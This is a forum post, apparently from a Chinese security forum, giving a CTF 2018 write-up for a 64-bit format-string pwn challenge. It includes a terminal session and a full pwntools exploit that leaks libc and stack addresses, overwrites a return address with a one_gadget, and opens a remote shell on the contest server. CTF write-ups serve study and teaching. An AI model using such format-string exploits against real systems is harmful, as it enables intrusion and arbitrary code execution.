首页
论坛
课程
招聘
雪    币: 2732
活跃值: 活跃值 (10)
能力值: ( LV15,RANK:828 )
在线值:
发帖
回帖
粉丝

[原创] 看雪ctf 2018 团队赛 - 你眼中的世界

2018-12-27 17:08 2736

[原创] 看雪ctf 2018 团队赛 - 你眼中的世界

aqs 活跃值
5
2018-12-27 17:08
2736

64bit 格式化,服务器环境貌似搞得不好,原本的fortify_source 没有用了,直接暴力写个one_gadget 就完事了

❯ nc 211.159.175.39 8686                                  
echo from your heart                                      
lens of your word: 10                                     
word: %n                                                  
echo:                                                     
lens of your word: ^C                                     

本地------                                              
[root@aqsv] ~/pediy                                      
❯ ./echo_from_your_heart                                  
echo from your heart                                      
lens of your word: 10                                     
word: %n                                                  
echo: *** %n in writable segment detected ***             
[1]    26614 abort (core dumped)  ./echo_from_your_heart

丑陋的exp = =

from pwn import *                                                                
p=remote('211.159.175.39',8686)                                                  


def oneloop(payload):                                                            
    p.sendlineafter('your word:',str(len(payload)+10))                           
    p.sendlineafter('word:',payload)                                             


payload=''.join(['%{}$016lx '.format(str(x)) for x in range(1,39)])              
oneloop(payload)                                                                 
leak= p.recvuntil("lens",drop=True).strip().split(' ')                           

libcleak=int(leak[8],16)-240-0x20740                                             
one_gadget=libcleak+0x45216                                                      
stackleak=int(leak[10],16)                                                       
p.info("libcleak "+hex(libcleak))                                                
p.info("stackleak "+hex(stackleak))                                              
p.info("one_gadget "+hex(one_gadget))                                            


payload='%{}c%10$hn'.format(str(-0xe0+stackleak&0xffff))                         
payload+=''.join(['%{}$016lx '.format(str(x)) for x in range(1,10)])             
oneloop(payload)                                                                 


payload='%{}c%36$hn'.format(str(one_gadget&0xffff))                              
payload+=''.join(['%{}$016lx '.format(str(x)) for x in range(1,36)])             
oneloop(payload)                                                                 

payload='%{}c%10$hn'.format(str(-0xe0+2+stackleak&0xffff))                       
payload+=''.join(['%{}$016lx '.format(str(x)) for x in range(1,10)])             
oneloop(payload)                                                                 


payload='%{}c%36$hhn'.format(str((one_gadget>>16)&0xffff))                       
payload+=''.join(['%{}$016lx '.format(str(x)) for x in range(1,36)])             
oneloop(payload)                                                                 

p.interactive()


HWS计划·2020安全精英夏令营来了!我们在华为松山湖欧洲小镇等你

最后于 2018-12-28 11:43 被aqs编辑 ,原因:
最新回复 (0)
游客
登录 | 注册 方可回帖
返回